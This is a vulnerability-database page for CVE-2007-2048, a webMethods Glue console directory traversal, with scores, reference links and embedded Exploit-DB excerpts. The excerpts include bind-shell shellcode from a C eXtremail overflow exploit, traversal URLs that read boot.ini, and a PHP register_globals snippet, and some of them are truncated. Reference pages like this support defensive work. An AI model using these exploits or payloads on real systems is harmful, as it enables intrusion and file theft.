CVE-2007-2048
published 2007-04-16CVE-2007-2048: Directory traversal vulnerability in /console in the Management Console in webMethods Glue 6.5.1 and earlier allows remote attackers to read arbitrary system…
PriorityP333medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.83%
88.8th percentile
Directory traversal vulnerability in /console in the Management Console in webMethods Glue 6.5.1 and earlier allows remote attackers to read arbitrary system files via a .. (dot dot) in the resource parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webmethods | glue | — | — |
| webmethods | glue | — | — |
| webmethods | glue | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
webMethods Glue 6.5.1 Console - Directory Traversal
exploitdb·2007-04-11
CVE-2007-2048 webMethods Glue 6.5.1 Console - Directory Traversal
webMethods Glue 6.5.1 Console - Directory Traversal
---
source: https://www.securityfocus.com/bid/23423/info
webMethods Glue is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable computer with the privileges of the affected application. Information obtained may aid in further attacks.
This issue affects webMethods Glue 6.5.1; other versions may also be vulnerable.
http://www.example.com:8080/console?resource=../../../boot.ini
http://www.example.com:8080/console?resource=\boot.ini
http://www.example.com:8080/console?resource=c:\boot.ini
Exploit-DB
PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
exploitdb·2007-03-19
CVE-2007-1583 PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
---
source: https://www.securityfocus.com/bid/23016/info
PHP is prone to a weakness that allows attackers to enable the 'register_globals' directive because the application fails to handle a memory-limit exception.
Enabling the PHP 'register_globals' directive may allow attackers to further exploit latent vulnerabilities in PHP scripts.
This issue is related to the weakness found in the non-multibyte 'parse_str()' from BID 15249 - PHP Parse_Str Register_Globals Activation Weakness.
This issue affects PHP 4 to 4.4.6 and 5 to 5.2.1.
2048) $x[] = str_repeat("A", 1024);
// Will activate register_globals and trigger the memory_limit
mb_parse_str($str);
?>
No writeups or analysis indexed.
http://secunia.com/advisories/24933http://securityreason.com/securityalert/2589http://www.aushack.com/advisories/200704-webmethods.txthttp://www.securityfocus.com/archive/1/465332/100/0/threadedhttp://www.securityfocus.com/archive/1/465993/100/0/threadedhttp://www.securityfocus.com/archive/1/467873/30/6720/threadedhttp://www.securityfocus.com/bid/23423http://www.securitytracker.com/id?1017926http://www.vupen.com/english/advisories/2007/1363http://secunia.com/advisories/24933http://securityreason.com/securityalert/2589http://www.aushack.com/advisories/200704-webmethods.txthttp://www.securityfocus.com/archive/1/465332/100/0/threadedhttp://www.securityfocus.com/archive/1/465993/100/0/threadedhttp://www.securityfocus.com/archive/1/467873/30/6720/threadedhttp://www.securityfocus.com/bid/23423http://www.securitytracker.com/id?1017926http://www.vupen.com/english/advisories/2007/1363
2007-04-16
Published